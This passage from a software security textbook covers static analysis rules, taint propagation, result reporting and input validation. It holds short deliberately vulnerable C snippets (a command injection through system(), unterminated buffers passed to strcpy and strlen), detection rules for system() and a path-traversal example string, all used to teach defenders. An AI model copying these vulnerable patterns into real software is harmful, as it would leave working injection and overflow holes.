Footnote 2. Parts of this section originally appeared in IEEE Security & Privacy Magazine as part of an article coauthored with Gary McGraw [Chess and McGraw, 2004].

• MOPS (MOdel checking Programs for Security properties) takes a model checking approach to look for violations of temporal safety properties in C programs [Chen and Wagner, 2002]. Developers can model their own safety properties, and MOPS has been used to identify privilege management errors, incorrect construction of chroot jails, file access race conditions, and ill-conceived temporary file schemes in large-scale systems, such as the Red Hat Linux 9 distribution [Schwarz et al., 2005].

• SATURN applies Boolean satisfiability to detect violations of temporal safety properties. It uses a summary-based approach to interprocedural analysis. It has been used to find more than 100 memory leaks and locking problems in Linux [Xie and Aiken, 2005].
• Splint extends the lint concept into the security realm [Larochelle and Evans, 2001]. Without adding any annotations, developers can perform basic lint-like checks. By adding annotations, developers can enable Splint to find abstraction violations, unannounced modifications to global variables, and possible use-before-initialization errors. Splint can also reason about minimum and maximum array bounds accesses if it is provided with function preconditions and postconditions.

• Pixy detects cross-site scripting vulnerabilities in PHP programs [Jovanovic et al., 2006]. The authors claim that their interprocedural, context-sensitive, and flow-sensitive analysis could easily be applied to other taint-style vulnerabilities such as SQL injection and command injection.

• The xg++ tool uses a template-driven compiler extension to attack the problem of finding kernel vulnerabilities in the Linux and OpenBSD operating systems [Ashcraft and Engler, 2002]. The tool looks for locations where the kernel uses data from an untrusted source without checking first, methods by which a user can cause the kernel to allocate memory and not free it, and situations in which a user could cause the kernel to deadlock. Similar techniques applied to general code quality problems such as null pointer dereferences led the creators of xg++ to form a company: Coverity.

A number of static analysis approaches hold promise but have yet to be directly applied to security. Some of the more noteworthy ones include ESP (a large-scale property verification approach) [Das et al., 2002] and model checkers such as SLAM [Ball et al., 2001] and BLAST [Henzinger et al., 2003].

Prove It

Throughout this discussion, we have quickly moved from an equation such as

    (x < y) ∧ (x = v) ∧ ¬(x < y)

to the conclusion that an assertion will succeed or fail. For a static analysis tool to make this same conclusion, it needs to use a constraint solver.
Some static analysis tools have their own specialized constraint solvers, while others use independently developed solvers. Writing a good solver is a hard problem all by itself, so if you create your own, be sure to create a well-defined interface between it and your constraint-generation code. Different solvers are good for different problems, so be sure your solver is well matched to the problems that need to be solved.

Popular approaches to constraint solving include the Nelson-Oppen architecture for cooperating decision procedures [Nelson, 1981] as implemented by Simplify [Detlefs et al., 1996]. Simplify is used by the static analysis tools ESC/Java [Flanagan et al., 2002] and Eau Claire [Chess, 2002]. In recent years, Boolean satisfiability solvers (SAT solvers) such as zChaff [Moskewicz et al., 2001] have become efficient enough to make them effective for static analysis purposes. The static analysis tool SATURN [Xie and Aiken, 2005] uses zChaff. Packages for manipulating binary decision diagrams (BDDs), such as BuDDy, are also seeing use in tools such as Microsoft SLAM [Ball et al., 2001]. Examples of static analysis tools that use custom solvers include the buffer overflow detectors ARCHER [Xie et al., 2003] and BOON [Wagner et al., 2000].

4.3 Rules

The rules that define what a security tool should report are just as important as, if not more important than, the analysis algorithms and heuristics that the tool implements. The analysis algorithms do the heavy lifting, but the rules call the shots. Analysis algorithms sometimes get lucky and reach the right conclusions for the wrong reasons, but a tool can never report a problem outside its rule set.

Early security tools were sometimes compared simply by counting the number of rules that each tool came packaged with by default. More recent static analysis tools are harder to compare.
Rules might work together to detect an issue, and an individual rule might refer to abstract interfaces or match method names against a regular expression. Just as more code does not always make a better program, more rules do not always make a better static analysis tool.

Code quality tools sometimes infer rules from the code they are analyzing. If a program calls the same method in 100 different locations, and in 99 of those locations it pays attention to the method’s return value, there is a decent chance that there is a bug at the single location that does not check the return value. This statistical approach to inferring rules does not work so well for identifying security problems. If a programmer did not understand that a particular construct represents a security risk, the code might uniformly apply the construct incorrectly throughout the program, which would result in a 100% false negative rate given only a statistical approach.

Rules are not just for defining security properties. They’re also used to define any program behavior not explicitly included in the program text, such as the behavior of any system or third-party libraries that the program uses. For example, if a Java program uses the java.util.Hashtable class, the static analysis tool needs rules that define the behavior of a Hashtable object and all its methods. It’s a big job to create and maintain a good set of modeling rules for system libraries and popular third-party libraries.

Rule Formats

Good static analysis tools externalize the rules they check so that rules can be added, subtracted, or altered without having to modify the tool itself. The best static analysis tools externalize all the rules they check. In addition to adjusting the out-of-the-box behavior of a tool, an external rules interface enables the end user to add checks for new kinds of defects or to extend existing checks in ways that are specific to the semantics of the program being analyzed.
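To make the idea of externalized rules concrete, the following Python sketch keeps the rules in a data file (shown inline as a JSON string) and leaves the checker generic. The JSON layout, the field names, and the functions load_rules and check_call are all hypothetical and are not the format of any real tool; call sites are assumed to have been parsed already into a function name and a list of (text, is_string_literal) pairs.

```python
import json

# Hypothetical external rule file: flag a call when the given argument
# (numbered from 1) is not a string literal.
RULES_JSON = """
[
  {"function": "system", "arg": 1, "severity": "High"},
  {"function": "popen",  "arg": 1, "severity": "High"}
]
"""


def load_rules(text):
    """Index the rules by function name."""
    return {rule["function"]: rule for rule in json.loads(text)}


def check_call(rules, function, args):
    """Return a finding string, or None if no rule is violated."""
    rule = rules.get(function)
    if rule is None:
        return None
    index = rule["arg"] - 1
    if index >= len(args):
        return None
    text, is_literal = args[index]
    if is_literal:
        return None
    return "%s: %s() argument %d is not a constant: %s" % (
        rule["severity"], function, rule["arg"], text)


rules = load_rules(RULES_JSON)
print(check_call(rules, "system", [("cmd", False)]))
print(check_call(rules, "system", [('"ls"', True)]))
```

Adding a check for another function means editing only the rule data; check_call() stays unchanged.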
Specialized Rule Files

Maintaining external files that use a specialized format for describing rules allows the rule format to be tailored to the capabilities of the analysis engine. Example 4.10 shows the RATS rule describing a command injection problem related to the system call system(). RATS will report a violation of the rule whenever it sees a call to system() where the first argument is not constant. It gives the function name, the argument number for the untrusted buffer (so that it can avoid reporting cases in which the argument is a constant), and the severity associated with a violation of the rule.

Example 4.10 A rule from RATS: calling system() is a risk if the first argument is not a string literal.

    system 1 High

Example 4.11 shows a rule from Fortify Source Code Analysis (SCA). The rule also detects command injection vulnerabilities related to calling system(), but this rule fires only if there is a path through the program through which an attacker could control the first argument and if that argument value has not been validated to prevent command injection. The Fortify rule contains more metadata than the RATS example, including a unique rule identifier and kingdom, category, and subcategory fields. As in the RATS example, it contains a default severity associated with violating the rule. It also contains a link to a textual description of the problem addressed by the rule.

Example 4.11 A rule from Fortify Source Code Analysis. Calling system() is a risk if the first argument can be controlled by an attacker and has not been validated.

    C Core AA212456-92CD-48E0-A5D5-E74CC26A276F Input Validation and Representation Command Injection 4.0 0 system

Annotations

In some cases, it is preferable to have rules appear directly in the text of the program, in the form of annotations.
If special rules govern the use of a particular module, putting the rules directly in the module (or the header file for the module) is a good way to make sure that the rules are applied whenever the module is used. Annotations are often more concise than rules that appear in external files because they do not have to explain the context they apply to; an annotation’s context is provided by the code around it. For example, instead of having to specify the name of a function, an annotation can simply appear just before the function declaration.

This tight binding to the source code has its disadvantages, too. For example, if the people performing the analysis are not the owners or maintainers of the code, they might not be allowed to add permanent annotations. One might be able to overcome this sort of limitation by creating special source files that contain annotations almost exclusively and using these source files only for the purpose of analysis.

Languages such as Java and C# have a special syntax for annotations. For languages that do not have an annotation syntax, annotations usually take the form of specially formatted comments. Example 4.12 shows an annotation written in the Java Modeling Language (JML). Although Sun has added syntax for annotations as of Java 1.5, annotations for earlier versions of Java must be written in comments. Annotations are useful for more than just static analysis. A number of dynamic analysis tools can also use JML annotations.

Example 4.12 A specification for the method read() written in JML. The specification requires the reader to be in a valid state when read() is called. It stipulates that a call to read() can change the state of the reader, and it ensures that the return value is in the range -1 to 65535.
    /*@ public normal_behavior
      @   requires valid;
      @   assignable state;
      @   ensures -1 <= \result && \result <= 65535;
      @*/
    public int read();

Bill Pugh, a professor at the University of Maryland and one of the authors and maintainers of FindBugs, has proposed a set of standard Java 1.5 annotations such as @NonNull and @CheckForNull that would be useful for static analysis tools [Pugh, 2006]. The proposal might grow to include annotations for taint propagation, concurrency, and internationalization.

Microsoft has its own version of source annotation: the Microsoft Standard Annotation Language (SAL). SAL works with the static analysis option built into Visual Studio 2005. You can use it to specify the ways a function uses and modifies its parameters, and the relationships that exist between parameters. SAL makes it particularly easy to state that the value of one parameter is used as the buffer size of another parameter, a common occurrence in C. Example 4.13 shows a function prototype annotated with SAL. Quite a few of the commonly used header files that ship with Visual Studio include SAL annotations.

Example 4.13 A function prototype annotated with Microsoft’s SAL. The annotation (in bold) indicates that the function will write to the variable buf but not read from it, and that the parameter sz gives the number of elements in buf.

    int fillBuffer(
      __out_ecount(sz) char* buf,
      size_t sz
    );

Other Rule Formats

Another approach to rule writing is to expose the static analysis engine’s data structures and algorithms programmatically. FindBugs allows programmers to create native plug-ins that the analysis engine loads at runtime. To add a new bug pattern, a programmer writes a new visitor class and drops it in the plug-ins directory. FindBugs instantiates the class and passes it a handle to each class in the program being analyzed.
Although a plug-in approach to rule writing is quite flexible, it sets a high bar for authors: A rule writer must understand both the kind of defect he or she wants to detect and the static analysis techniques necessary to detect it.

One of the first static analysis tools we wrote was a checker that looked for testability problems in hardware designs written in Verilog. (Brian wrote it back when he worked at Hewlett-Packard.) It used a scripting language to expose its analysis capabilities. Users could write Tcl scripts and call into a set of functions for exploring and manipulating the program representation. This approach requires less expertise on the part of rule writers, but user feedback was largely negative. Users made alterations to the default rule scripts, and then there was no easy way to update the default rule set. Users wrote scripts that took a long time to execute because they did not understand the computational complexity of the underlying operations they were invoking, and they were not particularly happy with the interface because they were being asked not only to specify the results they wanted to see, but also to formulate the best strategy for achieving them. Just as a database exposes the information it holds through a query language instead of directly exposing its data structures to the user, we believe that a static analysis tool should provide a good abstraction of its capabilities instead of forcing the user to understand how to solve static analysis problems.

The most innovative approach to rule writing that we have seen in recent years is Program Query Language (PQL) [Martin et al., 2005]. PQL enables users to describe the sequence of events they want to check for using the syntax of the source language. Example 4.14 gives a PQL query for identifying a simple flavor of SQL injection.

Example 4.14 A PQL query for identifying a simple variety of SQL injection: When a request parameter is used directly as a database query.
    query simpleSQLInjection()
    uses
        object HttpServletRequest r;
        object Connection c;
        object String p;
    matches { p = r.getParameter(_); }
    replaces c.execute(p)
        with Util.CheckedSQL(c, p);

Rules for Taint Propagation

Solving taint propagation problems with static analysis requires a variety of different rule types. Because so many security problems can be represented as taint propagation problems, we outline the various taint propagation rule types here:

• Source rules define program locations where tainted data enter the system. Functions named read() often introduce taint in an obvious manner, but many other functions also introduce taint, including getenv(), getpass(), and even gets().
• Sink rules define program locations that should not receive tainted data. For SQL injection in Java, Statement.executeQuery() is a sink. For buffer overflow in C, assigning to an array is a sink, as is the function strcpy().
• Pass-through rules define the way a function manipulates tainted data. For example, a pass-through rule for the java.lang.String method trim() might explain “if a String s is tainted, the return value from calling s.trim() is similarly tainted.”
• A cleanse rule is a form of pass-through rule that removes taint from a variable. Cleanse rules are used to represent input validation functions.
• Entry-point rules are similar to source rules, in that they introduce taint into the program, but instead of introducing taint at points in the program where the function is invoked, entry-point functions are invoked by an attacker. The C function main() is an entry point, as is any Java method named doPost() in an HttpServlet object.

To see how the rule types work together to detect a vulnerability, consider Figure 4.8. It shows a source rule, a pass-through rule, and a sink rule working together to detect a command injection vulnerability. A source rule carries the knowledge that fgets() taints its first argument (buf).
Dataflow analysis connects one use of buf to the next, at which point a pass-through rule allows the analyzer to move the taint through the call to strcpy() and taint othr. Dataflow analysis connects one use of othr to the next, and finally a sink rule for system() reports a command injection vulnerability because othr is tainted.

    if ( fgets ( buf , sizeof(buf), stdin) == buf ) {
        strcpy ( othr , buf );
        system ( othr );
    }

    1. A source rule for fgets() taints buf.
    2. Dataflow analysis connects uses of buf.
    3. A pass-through rule for strcpy() taints othr.
    4. Dataflow analysis connects uses of othr.
    5. Because othr is tainted, a sink rule for system() reports a command injection vulnerability.

Figure 4.8 Three dataflow rules work together to detect a command injection vulnerability.

In its simplest form, taint is a binary attribute of a piece of data: the value is either tainted or untainted. In reality, input validation problems are not nearly so clear cut. Input can be trusted for some purposes, but not for others. For example, the argument parameters passed to a C program’s main() function are not trustworthy, but most operating systems guarantee that the strings in the argv array will be null-terminated, so it is safe to treat them as strings. To represent the fact that data can be trusted for some purposes but not for others, different varieties of tainted data can be modeled as carriers of different taint flags.

Taint flags can be applied in a number of different ways. First, different source rules can introduce data with different taint flags. Data from the network could be marked FROM_NETWORK, and data from a configuration file might be marked FROM_CONFIGURATION. If these taint flags are carried over into the static analysis output, they allow an auditor to prioritize output based on the source of the untrusted data. Second, sink functions might be dangerous only when reached by data carrying a certain type of taint.
A cross-site scripting sink is vulnerable when it receives arbitrary user-controlled data, but not when it receives only numeric data.

Source, sink, and pass-through rules can manipulate taint in either an additive or a subtractive manner. We have seen successful implementations of both approaches. In the subtractive case, source rules introduce data carrying all the taint flags that might possibly be of concern. Input validation functions are modeled with pass-through rules that strip the appropriate taint flags, given the type of validation they perform. Sink rules check for dangerous operations on tainted data or for tainted data escaping from the application tier (such as passing from business logic to back-end code) and trigger if any of the offending taint flags are still present. In the additive case, source rules introduce data tainted in a generic fashion, and input validation functions add taint flags based on the kind of validation they perform, such as VALIDATED_XSS for a function that validates against cross-site scripting attacks. Sinks fill the same role as in the subtractive case, firing either when a dangerous operation is performed on an argument that does not hold an appropriate set of taint flags or when data leave the application tier without all the necessary taint flags.

Rules in Print

Throughout Part II, “Pervasive Problems,” and Part III, “Features and Flavors,” we discuss techniques for using static analysis to identify specific security problems in source code. These discussions take the form of specially formatted callouts labeled “Static Analysis.” Many of these sections include a discussion of specific static analysis rules that you can use to solve the problem at hand.

For the most part, formats that are easy for a computer to understand, such as the XML rule definition that appears earlier in this chapter, are not ideal for human consumption.
For this reason, we introduce a special syntax here for defining rules. This is the rule syntax we use for the remainder of the book.

Configuration Rules

We specify configuration rules for XML documents with XPath expressions. The rule definitions also include a file pattern to control which files the static analysis tool applies the XPath expression to, such as web.xml or *.xml.

Model Checking Rules

Instead of giving their definitions textually, we present model checking rules using state machine diagrams similar to the one found earlier in this chapter. Each model checking diagram includes an edge labeled “start” that indicates the initial state the rule takes on, and has any number of transitions leading to other states that the analysis algorithm will follow whenever it encounters the code construct associated with the transition.

Structural Rules

We describe structural rules using the special language introduced in the sidebar earlier in this chapter. Properties in the language correspond to common properties in source code, and most rules are straightforward to understand without any existing knowledge of the language.

Taint Propagation Rules

Taint propagation rules in the book include a combination of the following elements:

• Method or function: Defines the method or function that the rule will match. All aspects of the rule are applied only to code constructs that match this element, which can include special characters, such as the wildcard (*) or the logical or operator (|).
• Precondition: Defines conditions on the taint propagation algorithm’s state that must be met for the rule to trigger. Precondition statements typically specify which arguments to a function must not be tainted or which taint flags must or must not be present, so preconditions stand for sink rules. If the precondition is not met, the rule will trigger.
In the case of sink rules, a violation of the precondition results in the static analysis tool reporting an instance of the vulnerability the rule represents.
• Postcondition: Describes changes to the taint propagation algorithm’s state that occur when a method or function the rule matches is encountered. Postcondition statements typically taint or cleanse certain variables, such as the return value from the function or any of its arguments, and can also include assignment of taint flags to these variables. Postconditions represent source or pass-through information.
• Severity: Allows the rule definition to specify the severity of the issues the taint propagation algorithm produces when a sink rule is triggered. In some cases, it is important to be able to differentiate multiple similar results that correspond to the same type of vulnerability.

4.4 Reporting Results

Most of the academic research effort invested in static analysis tools is spent devising clever new approaches to identifying defects. But when the time comes for a tool to be put to work, the way the tool reports results has a major impact on the value the tool provides. Unless you have a lab full of Ph.D. candidates ready to interpret raw analyzer output, the results need to be presented in such a way that the user can make a decision about the correctness and importance of the result, and can take an appropriate corrective action. That action might be a code change, but it might also be an adjustment of the tool.

Tool users tend to use the term false positive to refer to anything that might come under the heading “unwanted result.” Although that’s not the definition we use, we certainly understand the sentiment. From the user’s perspective, it doesn’t matter how fancy the underlying analysis algorithms are. If you can’t make sense of what the tool is telling you, the result is useless. In that sense, bad results can just as easily stem from bad presentation as they can from an analysis mistake.
It is part of the tool’s job to present results in such a way that users can divine their potential impact. Simple code navigation features such as jump-to-definition are important. If a static analysis tool can be run as a plug-in inside a programmer’s integrated development environment (IDE), everyone wins: The programmer gets a familiar code navigation setup, and the static analysis tool developers don’t have to reinvent code browsing.

Auditors need at least three features for managing tool output:

• Grouping and sorting results
• Eliminating unwanted results
• Explaining the significance of results

We use the Fortify audit interface (Audit Workbench) to illustrate these features. Figure 4.9 shows the Audit Workbench main view.

Figure 4.9 The Audit Workbench interface.

Grouping and Sorting Results

If users can group and sort issues in a flexible manner, they can often eliminate large numbers of unwanted results without having to review every issue individually. For example, if the program being analyzed takes some of its input from a trusted file, a user reviewing results will benefit greatly from a means by which to eliminate all results that were generated under the assumption that the file was not trusted.

Because static analysis tools can generate a large number of results, users appreciate having results presented in a ranked order so that the most important results will most likely appear early in the review. Static analysis tools have two dimensions along which they can rank results. Severity gives the gravity of the finding, under the assumption that the tool has not made any mistakes. For example, a buffer overflow is usually a more severe security problem than a null pointer dereference. Confidence gives an estimate of the likelihood that the finding is correct. A tool that flags every call to strcpy() as a potential buffer overflow produces low confidence results.
A tool that can postulate a method by which a call to strcpy() might be exploited is capable of producing higher confidence results. In general, the more assumptions a tool has to make to arrive at a result, the lower the confidence in the result.

To create a ranking, a tool must combine severity and confidence scores for each result. Typically, severity and confidence are collapsed into a simple discrete scale of importance, such as Critical (C), High (H), Medium (M), and Low (L), as shown in Figure 4.10. This gives auditors an easy way to prioritize their work.

[Figure 4.10: a grid with Severity on one axis and Confidence on the other; each cell is labeled C = Critical, H = High, M = Medium, or L = Low.]

Figure 4.10 Severity and confidence scores are usually collapsed into a simple discrete scale of importance, such as Critical (C), High (H), Medium (M), and Low (L).

Audit Workbench groups results into folders based on a three-tier scale. It calls the folders Hot, Warning, and Info. A fourth folder displays all issues. Figure 4.11 shows the Audit Workbench folder view.

[Figure 4.11 callouts: Folders hold groups of issues. By default, issues in a folder are grouped by type and then by program location. They can be re-sorted and searched.]

Figure 4.11 Sorting and searching results in Audit Workbench.

Eliminating Unwanted Results

Reviewing unwanted results is no fun, but reviewing the same unwanted results more than once is maddening. All advanced static analysis tools provide mechanisms for suppressing results so that they will not be reported in subsequent analysis runs. If the system is good, suppression information will carry forward to future builds of the same codebase. Similarly, auditors should be able to share and merge suppression information so that multiple people don’t need to audit the same issues.

Users should be able to turn off entire categories of warnings, but they also need to be able to eliminate individual errors.
Many tools allow results to be suppressed using pragmas or code annotations, but if the person performing the code review does not have permission to modify the code, there needs to be a way to store suppression information outside the code. One possibility is to simply store the filename, line number, and issue type. The problem is that even a small change to the file can cause all the line numbers to shift, thereby invalidating the suppression information. This problem can be lessened by storing a line number as an offset from the beginning of the function it resides in or as an offset from the nearest labeled statement. Another approach, which is especially useful if a result includes a trace through the program instead of just a single line, is to generate an identifier for the result based on the program constructs that comprise the trace. Good input for generating the identifier includes the names of functions and variables, relevant pieces of the control flow graph, and identifiers for any rules involved in determining the result.

Explaining the Significance of the Results

Good bug reports from human testers include a description of the problem, an explanation of who the problem affects or why it is important, and the steps necessary to reproduce the problem. But even good bug reports are occasionally sent back marked “could not reproduce” or “not an issue.” When that happens, the human tester gets a second try at explaining the situation. Static analysis tools don’t get a second try, so they have to make an effective argument the first time around. This is particularly difficult because a programmer might not immediately understand the security ramifications of a finding. A scenario that might seem far-fetched to an untrained eye could, in fact, be easy pickings for an attacker. The tool must explain the risk it has identified and the potential impact of an exploit.

Audit Workbench makes its case in two ways.
First, if the result is based on tracking tainted data through the program, it presents a dataflow trace that gives the path through the program that an exploit could take. Second, it provides a textual description of the problem in both a short form and a detailed form. Figure 4.12 shows a dataflow trace and a short explanation.

Figure 4.12 Audit Workbench explains a result with a dataflow trace (when available) and a brief explanation.

The detailed explanation is divided into five parts:

• The abstract, a one-sentence explanation of the problem
• A description that explains the specific issue in detail and references the specifics of the issue at hand (with code examples)
• Recommendations for how the issue should be fixed (with a different recommendation given depending on the specifics of the issue at hand)
• Auditing tips that explain what a reviewer should do to verify that there is indeed a problem
• References that give motivated reviewers a place to go to read more if they are so inclined

For these two lines of code

    36 fread(buf, 1, sizeof(buf), fp);
    37 strcpy(ret, buf);

Audit Workbench would display the following detailed explanation:

String Termination Error

ABSTRACT

Relying on proper string termination may result in a buffer overflow.

DESCRIPTION

String termination errors occur when:

1. Data enter a program via a function that does not null terminate its output. In this case, the data enter at fread in reader.c at line 36.
2. The data are passed to a function that requires its input to be null terminated. In this case, the data are passed to strcpy in reader.c at line 37.

Example 1: The following code reads from cfgfile and copies the input into inputbuf using strcpy(). The code mistakenly assumes that inputbuf will always contain a null terminator.

    #define MAXLEN 1024
    ...
    char pathbuf[MAXLEN];
    ...
    read(cfgfile,inputbuf,MAXLEN); //does not null terminate
    strcpy(pathbuf,inputbuf); //requires null terminated input
    ...

The code in Example 1 will behave correctly if the data read from cfgfile are null terminated on disk as expected. But if an attacker is able to modify this input so that it does not contain the expected null character, the call to strcpy() will continue copying from memory until it encounters an arbitrary null character. This will likely overflow the destination buffer and, if the attacker can control the contents of memory immediately following inputbuf, can leave the application susceptible to a buffer overflow attack.

Example 2: In the following code, readlink() expands the name of a symbolic link stored in the buffer path so that the buffer buf contains the absolute path of the file referenced by the symbolic link. The length of the resulting value is then calculated using strlen().

    ...
    char buf[MAXPATH];
    ...
    readlink(path, buf, MAXPATH);
    int length = strlen(buf);
    ...

The code in Example 2 will not behave correctly because the value read into buf by readlink() will not be null-terminated. In testing, vulnerabilities such as this one might not be caught because the unused contents of buf and the memory immediately following it might be null, thereby causing strlen() to appear as if it is behaving correctly. However, in the wild, strlen() will continue traversing memory until it encounters an arbitrary null character on the stack, which results in a value of length that is much larger than the size of buf and could cause a buffer overflow in subsequent uses of this value.

Traditionally, strings are represented as a region of memory containing data terminated with a null character. Older string handling methods frequently rely on this null character to determine the length of the string.
If a buffer that does not contain a null terminator is passed to one of these functions, the function will read past the end of the buffer.

Malicious users typically exploit this type of vulnerability by injecting data with unexpected size or content into the application. They might provide the malicious input either directly as input to the program or indirectly by modifying application resources, such as configuration files. If an attacker causes the application to read beyond the bounds of a buffer, the attacker might be able to use a resulting buffer overflow to inject and execute arbitrary code on the system.

RECOMMENDATIONS

As a convention, replace all calls to strcpy() and similar functions with their bounded counterparts, such as strncpy(). On Windows platforms, consider using functions defined in strsafe.h, such as StringCbCopy(), which takes a buffer size in bytes, or StringCchCopy(), which takes a buffer size in characters. On BSD UNIX systems, strlcpy() can be used safely because it behaves the same as strncpy(), except that it always null-terminates its destination buffer. On other systems, always replace instances of strcpy(d, s) with strncpy(d, s, SIZE_D) to check bounds properly and prevent strncpy() from overflowing the destination buffer. Because strncpy() does not null-terminate d when s holds SIZE_D or more characters, follow the call with d[SIZE_D - 1] = '\0'. For example, if d is a stack-allocated buffer, SIZE_D can be calculated using sizeof(d).

If your security policy forbids the use of strcpy(), you can enforce the policy by writing a custom rule to unconditionally flag this function during a source analysis of an application. Another mechanism for enforcing a security policy that disallows the use of strcpy() within a given code base is to include a macro that will cause any use of strcpy to generate a compile error:

    #define strcpy unsafe_strcpy

AUDITING TIPS

At first glance, the following code might appear to correctly handle the fact that readlink() does not null-terminate its output. But read the code carefully; this is an off-by-one error.

    ...
    char buf[MAXPATH];
    int size = readlink(path, buf, MAXPATH);
    if (size != -1){
        buf[size] = '\0';
        strncpy(filename, buf, MAXPATH);
        length = strlen(filename);
    }
    ...

By calling strlen(), the programmer relies on a string terminator. The programmer has attempted to explicitly null-terminate the buffer to guarantee that this dependency is always satisfied. The problem with this approach is that it is error prone. In this example, if readlink() returns MAXPATH, then buf[size] will refer to a location outside the buffer; strncpy() will fail to null-terminate filename, and strlen() will return an incorrect (and potentially huge) value.

REFERENCES

[1] M. Howard and D. LeBlanc. Writing Secure Code, Second Edition. Microsoft Press, 2003. (Discussion of Microsoft string-manipulation APIs.)

Summary

Major challenges for a static analysis tool include choosing an appropriate representation for the program being analyzed (building a model) that makes good trade-offs between precision and scalability, and choosing algorithms capable of finding the target set of defects. Essential static analysis problems often involve some of the same techniques as compiler optimization problems, including tracking dataflow and control flow. Tracking tainted data through a program is particularly relevant to identifying security defects because so many security problems are a result of trusting untrustworthy input.

Good static analysis tools are rule driven. Rules tell the analysis engine how to model the environment and the effects of library and system calls. Rules also define the security properties that the tool will check against. Good static analysis tools are extensible: they allow the user to add rules to model new libraries or environments and to check for new security properties.

Ease of use is an often-overlooked but critical component of a static analysis tool. Users need help understanding the results the tool finds and why they are important.
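To make the rule-driven taint tracking summarized above more concrete, the following C sketch models the subtractive taint-flag approach from Section 4.3 with bit flags. It is an illustration under stated assumptions, not a description of how any particular tool is implemented: the flag names, the taint_t type, and every function in the block are hypothetical.

```c
#include <assert.h>

/* Hypothetical taint flags: one bit per kind of concern (names are illustrative). */
#define TAINT_XSS     0x1u  /* may contain HTML metacharacters  */
#define TAINT_SQL     0x2u  /* may contain SQL metacharacters   */
#define TAINT_COMMAND 0x4u  /* may contain shell metacharacters */
#define TAINT_ALL     (TAINT_XSS | TAINT_SQL | TAINT_COMMAND)

typedef unsigned int taint_t;

/* Source rule: data entering the program carries every flag of concern. */
taint_t apply_source_rule(void)
{
    return TAINT_ALL;
}

/* Pass-through rule: the output is exactly as tainted as the input. */
taint_t apply_pass_through_rule(taint_t input)
{
    return input;
}

/* Cleanse rule: a validation function strips only the flags it addresses. */
taint_t apply_cleanse_rule(taint_t input, taint_t validated)
{
    return input & ~validated;
}

/* Sink rule: fires (returns 1) if any flag the sink cares about remains. */
int sink_rule_fires(taint_t argument, taint_t dangerous)
{
    return (argument & dangerous) != 0;
}

/* Walks the flow from Figure 4.8 and checks the outcome at the sink. */
void check_figure_4_8_flow(void)
{
    taint_t buf = apply_source_rule();            /* fgets() taints buf      */
    taint_t othr = apply_pass_through_rule(buf);  /* strcpy() taints othr    */

    assert(sink_rule_fires(othr, TAINT_COMMAND)); /* system(othr) is flagged */

    /* A hypothetical shell-metacharacter validator clears one flag only. */
    othr = apply_cleanse_rule(othr, TAINT_COMMAND);
    assert(!sink_rule_fires(othr, TAINT_COMMAND));
    assert(sink_rule_fires(othr, TAINT_SQL));     /* still unsafe for SQL    */
}
```

An additive variant would start from a generic taint value and have validation functions set flags instead of clearing them; the sink check would then test for the absence of the required flags.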
PART II

Pervasive Problems

Chapter 5 Handling Input
Chapter 6 Buffer Overflow
Chapter 7 Bride of Buffer Overflow
Chapter 8 Errors and Exceptions

5 Handling Input

Distrust and caution are the parents of security.
- Benjamin Franklin

The most important defensive measure developers can take is to thoroughly validate the input their software receives. Input Validation and Representation is Kingdom #1 because unchecked or improperly checked input is the source of some of the worst vulnerabilities around, including buffer overflow, SQL injection, and a whole host of others. Ask your local software security guru to name the single most important thing that developers can do to write secure code, and nine out of ten will tell you, “Never trust input.”

Now try saying “Never trust input” to a group of programmers, and take stock of the quizzical looks on their faces. This edict meets with some skepticism for good reason. After all, there is only a small set of good programs you can write that require no input. You can compute pi or discover really large prime numbers, but go much beyond that, and you’re going to need some input. If you can’t trust input, how can your program do anything useful?

Of course programs need to accept input, and computing a good result depends on having good input. If the purpose of your program is to retrieve an account balance from a database and display it to a user, and the database says the balance is $100, your program probably has no way to determine whether the balance should really be $1,000 or –$20. However, your program should be able to tell the difference between input that might feasibly be correct and input that is most definitely bogus. If the database says the account balance is “../../../../../../var/log/system.log” or $1,000,000,000,000,000,000,000,000,000, your code should not play along.
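As a sketch of what refusing to play along can look like in C, the function below accepts a balance only if it is a plain integer number of cents that falls inside a plausible range. The function name, the decision to represent the balance as a string of cents, and both limits are assumptions made for illustration; a real application would choose limits that fit its own business rules.

```c
#include <assert.h>
#include <ctype.h>
#include <errno.h>
#include <stdlib.h>

/* Hypothetical policy limits, in cents; chosen only for illustration. */
#define MIN_BALANCE_CENTS (-100000000LL)    /* -$1,000,000.00    */
#define MAX_BALANCE_CENTS (100000000000LL)  /* $1,000,000,000.00 */

/*
 * Returns 1 and stores the value in *out if text is a whole number of cents
 * within the limits above; returns 0 (leaving *out untouched) otherwise.
 */
int parse_balance_cents(const char *text, long long *out)
{
    char *end = NULL;
    long long value;

    assert(out != NULL);  /* a NULL output pointer is a programming error */

    /* Must start with a digit or a minus sign: no whitespace, no '+'. */
    if (text == NULL || !(isdigit((unsigned char)text[0]) || text[0] == '-'))
        return 0;

    errno = 0;
    value = strtoll(text, &end, 10);
    if (errno == ERANGE)
        return 0;  /* too large or too small for a long long */
    if (end == text || *end != '\0')
        return 0;  /* no digits at all, or trailing characters */
    if (value < MIN_BALANCE_CENTS || value > MAX_BALANCE_CENTS)
        return 0;  /* well-formed, but not a plausible balance */

    *out = value;
    return 1;
}
```

A caller that receives 0 should decline to display or use the value rather than attempt to repair it.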
The programmer is the most qualified individual to define the kinds of input that are valid in the context of their code. Situations will always arise in which you have to depend on correct input to produce correct results. You cannot be responsible for knowing whether all the input you receive is correct. You can, however, be responsible for ensuring that the input you accept is not obviously wrong.

Don’t expect input to be formatted properly, make sense, be self-consistent, follow normal encoding conventions, or adhere to any sort of standard. Don’t expect that you can trust input just because it comes from a source that seems like it should be wholesome and reliable. Don’t trust input just because you wrote the program that is supposed to generate that input; your program might find itself receiving input from a less trustworthy source or the trusted source itself might be compromised. When your input validation code identifies a problem, gracefully decline to accept the request. Don’t patch it up and try to soldier on. In short, be suspicious about the input you handle, and ensure that when input does not match your expectations, you chart a secure course nonetheless.

You have to accept input, but you can’t trust it, so what do you do? You sanity-check it. You corroborate it. You take control and limit it to only the values that you know for certain are acceptable. We refer to these activities collectively as input validation.

This chapter looks at what needs to be validated, how to perform validation, how to respond when input fails a validation check, and how to structure your software to make good input validation easier. We discuss the various ways that program input should be validated, strategies for performing validation, and ways to verify that your strategy has been implemented correctly. Along the way, we look at a multitude of security problems that resulted from inadequate input validation.
In subsequent chapters, input validation problems come up repeatedly in the context of various program activities. In those later chapters, we look at individual input validation requirements and specific vulnerabilities related to mishandled input. The primary message in this chapter is that no form or aspect of program input should be trusted by default.

The chapter unfolds as follows:

• What to validate
